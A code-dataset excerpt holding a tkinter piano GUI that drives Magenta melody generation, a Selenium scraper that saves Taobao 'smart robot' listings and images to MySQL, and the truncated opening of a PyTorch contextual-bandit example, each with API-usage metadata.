event:value_E1())\nroot.bind(\"<;>\", lambda event: value_E1())\n\n\nbtnF1 = Tk.Label(tmp_frame3,height = 6, width = 8,bd = 4,text = \"F1\",font = (\"arial\",18,\"bold\"), bg = \"Gainsboro\",fg = \"black\")\nbtnF1.grid(row = 1, column = 10, padx = 5, pady = 5)\nbtnF1.bind(\"\",lambda event:value_F1())\nroot.bind(\"<'>\", lambda event: value_F1())\n\n\ndef call_melody_rnn(primer_melody):\n print(\"primer_melody: \")\n print(primer_melody)\n print(type(primer_melody))\n flist = tf.app.flags.FLAGS._flags()\n klist = []\n\n for i in flist:\n klist.append(i)\n\n for k in klist:\n tf.app.flags.FLAGS.__delattr__(k)\n\n FLAGS = tf.app.flags.FLAGS\n\n tf.app.flags.DEFINE_string(\n 'run_dir', None,\n 'Path to the directory where the latest checkpoint will be loaded from.')\n tf.app.flags.DEFINE_string(\n 'checkpoint_file', None,\n 'Path to the checkpoint file. run_dir will take priority over this flag.')\n tf.app.flags.DEFINE_string(\n 'bundle_file', \"/Users/yuhaomao/Downloads/lookback_rnn.mag\",\n 'Path to the bundle file. If specified, this will take priority over '\n 'run_dir and checkpoint_file, unless save_generator_bundle is True, in '\n 'which case both this flag and either run_dir or checkpoint_file are '\n 'required')\n tf.app.flags.DEFINE_boolean(\n 'save_generator_bundle', False,\n 'If true, instead of generating a sequence, will save this generator as a '\n 'bundle file in the location specified by the bundle_file flag')\n tf.app.flags.DEFINE_string(\n 'bundle_description', None,\n 'A short, human-readable text description of the bundle (e.g., training '\n 'data, hyper parameters, etc.).')\n tf.app.flags.DEFINE_string(\n 'output_dir', '/tmp/melody_rnn/generated',\n 'The directory where MIDI files will be saved to.')\n tf.app.flags.DEFINE_integer(\n 'num_outputs', 10,\n 'The number of melodies to generate. One MIDI file will be created for '\n 'each.')\n tf.app.flags.DEFINE_integer(\n 'num_steps', 128,\n 'The total number of steps the generated melodies should be, priming '\n 'melody length + generated steps. Each step is a 16th of a bar.')\n tf.app.flags.DEFINE_string(\n 'primer_melody', primer_melody,\n 'A string representation of a Python list of '\n 'magenta.music.Melody event values. For example: '\n '\"[60, -2, 60, -2, 67, -2, 67, -2]\". If specified, this melody will be '\n 'used as the priming melody. If a priming melody is not specified, '\n 'melodies will be generated from scratch.')\n tf.app.flags.DEFINE_string(\n 'primer_midi', '',\n 'The path to a MIDI file containing a melody that will be used as a '\n 'priming melody. If a primer melody is not specified, melodies will be '\n 'generated from scratch.')\n tf.app.flags.DEFINE_float(\n 'qpm', None,\n 'The quarters per minute to play generated output at. If a primer MIDI is '\n 'given, the qpm from that will override this flag. If qpm is None, qpm '\n 'will default to 120.')\n tf.app.flags.DEFINE_float(\n 'temperature', 1.0,\n 'The randomness of the generated melodies. 1.0 uses the unaltered softmax '\n 'probabilities, greater than 1.0 makes melodies more random, less than 1.0 '\n 'makes melodies less random.')\n tf.app.flags.DEFINE_integer(\n 'beam_size', 1,\n 'The beam size to use for beam search when generating melodies.')\n tf.app.flags.DEFINE_integer(\n 'branch_factor', 1,\n 'The branch factor to use for beam search when generating melodies.')\n tf.app.flags.DEFINE_integer(\n 'steps_per_iteration', 1,\n 'The number of melody steps to take per beam search iteration.')\n tf.app.flags.DEFINE_string(\n 'log', 'INFO',\n 'The threshold for what messages will be logged DEBUG, INFO, WARN, ERROR, '\n 'or FATAL.')\n\n tf.app.flags.DEFINE_string(\n 'hparams', \"\", 'Hyperparameter overrides, '\n 'represented as a string containing comma-separated '\n 'hparam_name=value pairs.')\n\n melody_rnn_generate.main(\"/Users/yuhaomao/Desktop/magenta/magenta/models/melody_rnn/melody_rnn_generate.py\")\n\n\n# ==========detect keyboard input\ndef root_exit():\n # global pids_begin\n # pids_begin = psutil.pids()\n # print(\"111\")\n # print(pids_begin)\n # os.system(\"python3 /Users/yuhaomao/Desktop/magenta/magenta/models/melody_rnn/melody_rnn_generate.py --config=lookback_rnn --bundle_file=/Users/yuhaomao/Downloads/lookback_rnn.mag --output_dir=/tmp/melody_rnn/generated --num_outputs=3 --num_steps=128 --primer_melody=\\\"%s\\\"\" % str(pitch_list))\n call_melody_rnn()\n # os.system(\"python3 /Users/yuhaomao/PycharmProjects/piano-python/play_midi.py /private/tmp/melody_rnn/generated/2019-05-07_143707_30.mid\")\n pygame.mixer.music.load(\"/Users/yuhaomao/Downloads/twinkle_twinkle.mid\")\n pygame.mixer.music.play()\n# timer=threading.Timer(3,root_exit)\n\ndef generate_play():\n global pitch_list\n pitch_list += m_r_g_pitch_list\n call_melody_rnn(str(pitch_list[-5:]))\n pygame.mixer.music.load(\"/private/tmp/melody_rnn/generated/%s\" % melody_rnn_generate.midi_file)\n pygame.mixer.music.play()\n root.after(13000,generate_play)\n\n\ndef detectInput():\n global start_stop\n global pitch_list\n # start_stop = True\n # global timer\n # timer.cancel()\n # timer = threading.Timer(3,root_exit)\n # timer.start()\n # os.system(\"python3 /Users/yuhaomao/Desktop/magenta/magenta/models/melody_rnn/melody_rnn_generate.py --config=lookback_rnn --bundle_file=/Users/yuhaomao/Downloads/lookback_rnn.mag --output_dir=/tmp/melody_rnn/generated --num_outputs=3 --num_steps=128 --primer_melody=\\\"%s\\\"\" % str(pitch_list))\n # print(\"123131\")\n # print(pitch_list)\n # print(type((pitch_list)))\n # print(type(\"[60,-2,60,-2,67,-2,67,-2]\"))\n pitch_list += m_r_g_pitch_list\n call_melody_rnn(str(pitch_list[-5:]))\n pygame.mixer.music.load(\"/private/tmp/melody_rnn/generated/%s\" % melody_rnn_generate.midi_file)\n pygame.mixer.music.play()\n root.after(13000,generate_play)\n # while start_stop:\n # # print(\"gui gui gui gui\")\n # # print(m_r_g_pitch_list)\n # # print(\"########################################\")\n # # t = time.time()\n # # print(\"detect input__\")\n # # print(int(round(t * 1000)))\n # # print(\"aaasdadadadsadsd\")\n # # print(melody_rnn_generate.midi_file)\n # # print('/private/tmp/melody_rnn/generated/%s' % melody_rnn_generate.midi_file)\n # pygame.mixer.music.load(\"/private/tmp/melody_rnn/generated/%s\" % melody_rnn_generate.midi_file)\n # pygame.mixer.music.play()\n # call_melody_rnn(str(pitch_list[-5:]))\n # root.update()\n # sleep(13)\n\ndef stop_music():\n # global start_stop\n # start_stop = False\n pygame.mixer.music.stop()\n # pids_stop = psutil.pids()\n # print(\"222\")\n # print(pids_stop)\n # kill(pids_stop[-1])\n # for pid in pids_stop:\n # # if pid not in pids_begin:\n # p = psutil.Process(pid)\n # print(\"pid-%d,pname-%s\" % (pid, p.name()))\n # # kill(pid)\n # pass\n\n\nroot.bind(\"\", lambda event:detectInput())\nroot.bind(\"\", lambda event:stop_music())\n\n# root.bind(\"\", lambda event:detectInput())\n# root.bind(\"\", lambda event:stop_music())\n#========= main loop\n\nroot.mainloop()", "repo_name": "myh1234567/piano-python", "sub_path": "gui_panio.py", "file_name": "gui_panio.py", "file_ext": "py", "file_size_in_byte": 20068, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pygame.mixer.init", "line_number": 19, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 19, "usage_type": "attribute"}, {"api_name": "threading.Lock", "line_number": 22, "usage_type": "call"}, {"api_name": "tkinter.Tk", "line_number": 25, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 48, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 49, "usage_type": "call"}, {"api_name": "pygame.mixer.Sound", "line_number": 60, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 60, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 69, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 69, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 78, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 78, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 87, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 87, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 96, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 96, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 105, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 105, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 114, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 114, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 123, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 123, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 132, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 132, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 141, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 141, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 150, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 150, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 159, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 159, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 168, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 168, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 177, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 177, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 186, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 186, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 195, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 195, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 204, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 204, "usage_type": "attribute"}, {"api_name": "pygame.mixer.Sound", "line_number": 213, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 213, "usage_type": "attribute"}, {"api_name": "tkinter.Label", "line_number": 234, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 237, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 243, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 248, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 251, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 254, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 260, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 266, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 271, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 274, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 277, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 283, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 288, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 291, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 294, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 298, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 304, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 310, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 316, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 322, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 328, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 334, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 340, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 346, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 352, "usage_type": "call"}, {"api_name": "tkinter.Label", "line_number": 358, "usage_type": "call"}, {"api_name": "tensorflow.app.flags.FLAGS._flags", "line_number": 368, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 368, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.FLAGS.__delattr__", "line_number": 375, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 375, "usage_type": "attribute"}, {"api_name": "tensorflow.app", "line_number": 377, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_string", "line_number": 379, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 379, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_string", "line_number": 382, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 382, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_string", "line_number": 385, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 385, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_boolean", "line_number": 391, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 391, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_string", "line_number": 395, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 395, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_string", "line_number": 399, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 399, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_integer", "line_number": 402, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 402, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_integer", "line_number": 406, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 406, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_string", "line_number": 410, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 410, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_string", "line_number": 417, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 417, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_float", "line_number": 422, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 422, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_float", "line_number": 427, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 427, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_integer", "line_number": 432, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 432, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_integer", "line_number": 435, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 435, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_integer", "line_number": 438, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 438, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_string", "line_number": 441, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 441, "usage_type": "attribute"}, {"api_name": "tensorflow.app.flags.DEFINE_string", "line_number": 446, "usage_type": "call"}, {"api_name": "tensorflow.app", "line_number": 446, "usage_type": "attribute"}, {"api_name": "magenta.models.melody_rnn.melody_rnn_generate.main", "line_number": 451, "usage_type": "call"}, {"api_name": "magenta.models.melody_rnn.melody_rnn_generate", "line_number": 451, "usage_type": "name"}, {"api_name": "pygame.mixer.music.load", "line_number": 463, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 463, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 464, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 464, "usage_type": "attribute"}, {"api_name": "magenta.models.melody_rnn.melody_rnn_generate.m_r_g_pitch_list", "line_number": 469, "usage_type": "name"}, {"api_name": "pygame.mixer.music.load", "line_number": 471, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 471, "usage_type": "attribute"}, {"api_name": "magenta.models.melody_rnn.melody_rnn_generate.midi_file", "line_number": 471, "usage_type": "attribute"}, {"api_name": "magenta.models.melody_rnn.melody_rnn_generate", "line_number": 471, "usage_type": "name"}, {"api_name": "pygame.mixer.music.play", "line_number": 472, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 472, "usage_type": "attribute"}, {"api_name": "magenta.models.melody_rnn.melody_rnn_generate.m_r_g_pitch_list", "line_number": 489, "usage_type": "name"}, {"api_name": "pygame.mixer.music.load", "line_number": 491, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 491, "usage_type": "attribute"}, {"api_name": "magenta.models.melody_rnn.melody_rnn_generate.midi_file", "line_number": 491, "usage_type": "attribute"}, {"api_name": "magenta.models.melody_rnn.melody_rnn_generate", "line_number": 491, "usage_type": "name"}, {"api_name": "pygame.mixer.music.play", "line_number": 492, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 492, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.stop", "line_number": 513, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 513, "usage_type": "attribute"}]} +{"seq_id": "26642861489", "text": "\"\"\"大概用时 210s\"\"\"\r\nfrom selenium import webdriver\r\nfrom pyquery import PyQuery as pq\r\nfrom selenium.webdriver.support.wait import WebDriverWait\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nfrom selenium.webdriver.chrome.options import Options\r\nfrom selenium.common.exceptions import TimeoutException\r\nfrom time import time\r\nimport pymysql\r\nimport requests\r\nimport re\r\nimport random\r\nimport os\r\n\r\nKEY = '智能机器人'\r\ncid = 16\r\nfolder1 = 'smart device/'\r\nfolder2 = 'smart robot/'\r\ndb = pymysql.connect(\"localhost\", \"root\", \"\", port=3306, db='myweb', charset='utf8')\r\ncursor = db.cursor()\r\ntable = 'itcast_goods'\r\n\r\nchrome_options = Options()\r\nchrome_options.add_argument('--headless')\r\nbrowser = webdriver.Chrome(chrome_options=chrome_options)\r\nbrowser.get('https://www.taobao.com')\r\nwait = WebDriverWait(browser, 10)\r\n\r\n\r\n# browser = webdriver.Chrome()\r\n# browser.get('https://www.taobao.com')\r\n# wait = WebDriverWait(browser, 10)\r\n\r\n\r\ndef enterANDfindpages(key):\r\n try:\r\n pages = 0\r\n global brower\r\n global wait\r\n input = wait.until(EC.presence_of_element_located((By.ID, 'q')))\r\n input.send_keys(key)\r\n button = wait.until(EC.presence_of_element_located((By.CLASS_NAME, 'btn-search')))\r\n button.click()\r\n doc = pq(browser.page_source)\r\n pages0 = doc('.total').text()\r\n try:\r\n pages = re.search(r'\\d+', pages0).group(0)\r\n except AttributeError:\r\n print('关键词未找到')\r\n return int(pages)\r\n except TimeoutException:\r\n enterANDfindpages(key)\r\n\r\n\r\ndef pagedetail(page):\r\n try:\r\n input = wait.until(\r\n EC.presence_of_element_located((By.CSS_SELECTOR, '#mainsrp-pager > div > div > div > div.form > input')))\r\n input.clear()\r\n input.send_keys(page)\r\n button = wait.until(EC.presence_of_element_located(\r\n (By.CSS_SELECTOR, '#mainsrp-pager > div > div > div > div.form > span.btn.J_Submit')))\r\n button.click()\r\n pp = browser.find_element_by_css_selector('#mainsrp-pager li.item.active > span').text\r\n wait.until(\r\n EC.text_to_be_present_in_element((By.CSS_SELECTOR, '#mainsrp-pager li.item.active > span'), str(page)))\r\n wait.until(\r\n EC.presence_of_element_located((By.CSS_SELECTOR, '#mainsrp-itemlist .items .item.J_MouserOnverReq')))\r\n return browser.page_source\r\n except Exception as ex:\r\n # print('ccl', ex.reason())\r\n pagedetail(page)\r\n\r\n\r\ndef download_image(item):\r\n if not os.path.exists(item.get('gid')):\r\n os.mkdir(item.get('gid'))\r\n i = 0\r\n try:\r\n for url in item.get('imgurl'):\r\n response = requests.get(url)\r\n if response.status_code == 200:\r\n i = i + 1\r\n file_path = '{0}/{1}.{2}'.format(item.get('gid'), i, 'jpg')\r\n if not os.path.exists(file_path):\r\n with open(file_path, 'wb')as f:\r\n f.write(response.content)\r\n else:\r\n print('Already downloaded!!!')\r\n except requests.ConnectionError:\r\n print(\"Downloading failed!!!\")\r\n\r\n\r\ndef findimageAndscription(url):\r\n # print(url) #如果出错可以不注释这里,查看出错的具体网页\r\n html = requests.get(url)\r\n doc = pq(html.text)\r\n urls = []\r\n if not doc('#J_UlThumb').html():\r\n if len(browser.window_handles) == 1:\r\n browser.execute_script('window.open()')\r\n browser.switch_to_window(browser.window_handles[1])\r\n browser.get(url)\r\n doc = pq(browser.page_source)\r\n browser.switch_to_window(browser.window_handles[0])\r\n html = doc('#J_UlThumb > li').items()\r\n for i in html:\r\n if re.search('60q90', str(i('a img').attr('src'))):\r\n img_url = i('a img').attr('src').strip('//')\r\n img_url = 'http://' + re.sub('_\\d+x\\d.+jpg.*?$', '', img_url).strip('//')\r\n elif re.search('_\\d+x\\d', str(i('a img').attr('data-src'))):\r\n img_url = 'https:' + i('a img').attr('data-src')\r\n img_url = re.sub('_\\d+x\\d.+jpg.*?$', '', img_url)\r\n else:\r\n img_url = ''\r\n urls.append(img_url)\r\n description = doc('#J_AttrUL').text()\r\n if not description:\r\n description = doc('#attributes > ul').text()\r\n description = re.sub('\\n', '++', description)\r\n if urls:\r\n # print(urls)\r\n data = []\r\n data.append(urls)\r\n data.append(description)\r\n return data\r\n else:\r\n return None\r\n\r\n\r\ndef get_products(html):\r\n doc = pq(html)\r\n doc('span').remove()\r\n items = doc('#mainsrp-itemlist .items .item.J_MouserOnverReq').items()\r\n for item in items:\r\n price = item('.price').text().replace('\\n', '').replace('¥', '')\r\n title = item.find('.ctx-box .row-2').text()\r\n title = re.sub('\\\\n|\\s', \"\", title)\r\n url = 'https://' + item.find('.ctx-box .row-2 .J_ClickStat').attr('href').lstrip('https://').lstrip('//')\r\n if re.search('tmall', url) or (not re.search('simba', url)):\r\n gid = re.search('id=(\\d+)', url).group(1)\r\n d = findimageAndscription(url)\r\n if d:\r\n data = {\r\n 'gid': gid,\r\n 'gname': title,\r\n 'price': price,\r\n 'thumb': folder1 + folder2 + gid,\r\n 'status': random.choice(['yes', 'no']),\r\n 'description': \"\".join(d.pop(1).split()),\r\n 'stock': random.randint(1, 100),\r\n 'cid': cid,\r\n 'sales': random.randint(1, 100),\r\n 'imgurl': d.pop(0)\r\n }\r\n # print(data)\r\n yield (data)\r\n else:\r\n yield None\r\n\r\n\r\ndef savetoMysql(data):\r\n keys = ','.join(data.keys())\r\n values = ','.join(['%s'] * len(data))\r\n sql2 = 'INSERT INTO {table}({keys}) values ({values})'.format(table=table, keys=keys, values=values)\r\n try:\r\n if cursor.execute(sql2, tuple(data.values())):\r\n print('success')\r\n db.commit()\r\n except Exception as e:\r\n print('erro', repr(e))\r\n db.rollback()\r\n\r\n\r\ndef save(data):\r\n download_image(data)\r\n data.pop('imgurl')\r\n # print(data)\r\n savetoMysql(data)\r\n # print(data)\r\n\r\n\r\ndef main():\r\n pages = enterANDfindpages(KEY)\r\n for page in range(1, 2):\r\n print(page)\r\n for d in get_products(pagedetail(page)):\r\n save(d)\r\n\r\n\r\nif __name__ == '__main__':\r\n if not os.path.exists(folder2):\r\n os.mkdir(folder2)\r\n os.chdir(folder2)\r\n ago = time()\r\n main()\r\n browser.close()\r\n print(\"用时\", time() - ago)\r\n", "repo_name": "LiuYuann/taobaogoods", "sub_path": "spider.py", "file_name": "spider.py", "file_ext": "py", "file_size_in_byte": 6846, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "pymysql.connect", "line_number": 20, "usage_type": "call"}, {"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 24, "usage_type": "call"}, {"api_name": "selenium.webdriver.Chrome", "line_number": 26, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 26, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.wait.WebDriverWait", "line_number": 28, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 41, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 41, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.ID", "line_number": 41, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 41, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 43, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 43, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CLASS_NAME", "line_number": 43, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 43, "usage_type": "name"}, {"api_name": "pyquery.PyQuery", "line_number": 45, "usage_type": "call"}, {"api_name": "re.search", "line_number": 48, "usage_type": "call"}, {"api_name": "selenium.common.exceptions.TimeoutException", "line_number": 52, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 59, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 59, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 59, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 59, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 62, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 62, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 63, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 63, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.expected_conditions.text_to_be_present_in_element", "line_number": 67, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 67, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 67, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 67, "usage_type": "name"}, {"api_name": "selenium.webdriver.support.expected_conditions.presence_of_element_located", "line_number": 69, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.expected_conditions", "line_number": 69, "usage_type": "name"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 69, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 69, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 77, "usage_type": "call"}, {"api_name": "os.path", "line_number": 77, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 78, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 86, "usage_type": "call"}, {"api_name": "os.path", "line_number": 86, "usage_type": "attribute"}, {"api_name": "requests.ConnectionError", "line_number": 91, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 97, "usage_type": "call"}, {"api_name": "pyquery.PyQuery", "line_number": 98, "usage_type": "call"}, {"api_name": "pyquery.PyQuery", "line_number": 105, "usage_type": "call"}, {"api_name": "re.search", "line_number": 109, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 111, "usage_type": "call"}, {"api_name": "re.search", "line_number": 112, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 114, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 121, "usage_type": "call"}, {"api_name": "pyquery.PyQuery", "line_number": 133, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 139, "usage_type": "call"}, {"api_name": "re.search", "line_number": 141, "usage_type": "call"}, {"api_name": "re.search", "line_number": 142, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 150, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 152, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 154, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 193, "usage_type": "call"}, {"api_name": "os.path", "line_number": 193, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 194, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 195, "usage_type": "call"}, {"api_name": "time.time", "line_number": 196, "usage_type": "call"}, {"api_name": "time.time", "line_number": 199, "usage_type": "call"}]} +{"seq_id": "23011001135", "text": "\"\"\"\nThe following example demonstrates how to solve the\ncontext-bandit problem. The example is taken from the book\nDeep Reinforcement Learning in Action by Manning.\nThe book GitHub repository is at https://github.com/DeepReinforcementLearning/DeepReinforcementLearningInAction\n\nThe n-armed bandit problem has an n-element action space meaning the space or set of all possible actions.\nHowever, there is no concept of state.\nThis means that there is no information in the environment that would help us choose a good arm.\nThe only way we could figure out which arms were good is by trial and error.\n\nIn the ad problem, we know the user is buying something on a particular site, which may give\nus some information about that user’s preferences and could help guide our\ndecision about which ad to place. We call this contextual information\nstate and this new class of problems contextual bandits\n\nThis example is using PyTorch to build a neural network that represents the state-action value function.\nIn particular, we are going to build a two-layer feedforward neural\nnetwork that uses rectified linear units (ReLU) as the activation function.\nThe first layer accepts a 10-element one-hot encoded vector of the state,\nand the final layer returns a 10-element\nvector representing the predicted reward for each action given the state.\n\n\"\"\"\n\nimport numpy as np\nimport random\nimport torch\nimport matplotlib.pyplot as plt\n\nfrom src.utils.array_utils import build_one_hot_encoding\nfrom src.policies.softmax_policy import SoftMaxPolicy\nfrom src.utils import INFO\n\nN_ACTIONS = 10\nTAU = 2.0\n\ndef running_mean(x, N=50):\n \"\"\"\n Helper function for plotting running mean\n :param x:\n :param N:\n :return:\n \"\"\"\n c = x.shape[0] - N\n y = np.zeros(c)\n conv = np.ones(N)\n for i in range(c):\n y[i] = (x[i:i+N] @ conv)/N\n return y\n\n\nclass ContextBandit:\n \"\"\"\n The class that represents the environment\n \"\"\"\n def __init__(self, arms=10):\n self.arms = arms\n self.bandit_matrix = None\n self.state = None\n self.init_distribution(arms)\n self.update_state()\n\n def step(self, arm):\n reward = self.get_reward(arm)\n self.update_state()\n return reward\n\n def init_distribution(self, arms: int):\n self.bandit_matrix = 